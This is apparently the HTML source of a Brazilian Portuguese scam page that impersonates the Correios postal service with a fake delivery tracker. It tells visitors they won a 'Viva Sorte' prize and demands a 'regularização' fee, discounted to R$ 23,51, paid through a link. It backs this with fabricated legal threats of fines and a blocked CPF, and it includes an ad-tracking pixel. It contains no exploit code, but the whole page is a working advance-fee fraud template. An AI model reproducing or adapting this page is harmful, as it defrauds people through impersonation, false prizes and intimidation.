<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="icon" href="images/favicon.png" type="./image/x-icon">
    <link rel="apple-touch-icon" sizes="180x180" href="images/favicon.png">

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">

    <link rel="stylesheet" href="css/base.css">
    <link rel="stylesheet" href="css/styles.css">

    <title>Correios - Envio</title>
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script></head>


<body>
    <div id="content">
        <img fetchpriority="high" decoding="async" width="607" height="89" src="images/bannerrr.png" class="attachment-large size-large wp-image-1993" alt="" srcset="images/bannerrr.png 607w, images/bannerrr.png 300w" sizes="(max-width: 607px) 100vw, 607px">

        <div class="progress-container">
            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar1"></div>
            
                    <div class="check-container" id="check1">
                        <img src="images/success.png" alt="Animação" id="img1">
                    </div>
                </div>

                <p id="text1">Pedido efetuado</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar2"></div>
            
                    <div class="check-container" id="check2">
                        <img src="images/success.png" alt="Animação" id="img2">
                    </div>
                </div>
                
                <p id="text2">Em separação</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar3"></div>
            
                    <div class="check-container" id="check3">
                        <img src="images/success.png" alt="Animação" id="img3">
                    </div>
                </div>
                
                <p id="text3">Envio</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar4"></div>
            
                    <div class="check-container" id="check4">
                        <img src="images/success.png" alt="Animação" id="img4">
                    </div>
                </div>
                
                <p id="text4">Entrega</p>
            </div>
        </div>

        <section id="more-information">
            <h1>ATENÇÃO!</h1>

<h2>Regularização de Premiação</h2>

<p>
Parabéns! Durante a conferência do seu <span class="bold">Bilhete Premiado</span> no programa <span class="bold">Viva Sorte</span>, foi identificado que para a liberação do seu prêmio é obrigatória a emissão da
<span class="bold">Nota Fiscal de Premiação</span>, conforme normas da Receita Federal.
</p>

<p>Essa taxa única é necessária para a entrega oficial do seu prêmio.</p>

<button id="show-offer" disabled="">REGULARIZAR ENTREGA</button>

</section>
</div>

<div id="offer-modal" class="modal">
    <div class="modal-content">

        <div id="step1">
            <h1>Processando Regularização...</h1>

            <div id="trace" class="progress-bar2"></div>

            <p>Aguarde enquanto finalizamos a emissão.</p>
        </div>

        <div id="step2">
            <p>VALOR DA REGULARIZAÇÃO:</p>

            <span id="value">R$ 368,70</span>

            <p>MAS você ganhou uma condição especial! Pague apenas <span class="bold2">R$ 23,51</span> com a parceria oficial do programa <span class="bold2">Viva Sorte</span>.</p>

            <h1>REGULARIZAÇÃO POR:</h1>

            <h1 id="value">R$ 23,51</h1>

            <a href="https://pay.sorte-hoje.online/N1nVZpYo1m0GlM6" style="display:inline-block;padding:15px 25px;background:#1e88e5;color:#fff;border-radius:5px;text-decoration:none;font-size:18px;margin-top:15px;">LIBERAR ENTREGA</a>

            <p style="margin-top:20px;">
                Atenção: O não pagamento implicará multa de até <span class="bold4">R$ 1.247,00</span> e bloqueio temporário do seu CPF, conforme o art. 45 do Decreto-Lei 37/66.
            </p>
        </div>
    </div>
</div>



    <script src="js/scripts.js"></script>
    
<script src="js/latest.js" data-utmify-prevent-xcod-sck="" data-utmify-prevent-subids="" async="" defer=""></script>
<script>
    
<script>
  window.pixelId = "6892aff8b693b32f424d023d";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>



</body></html>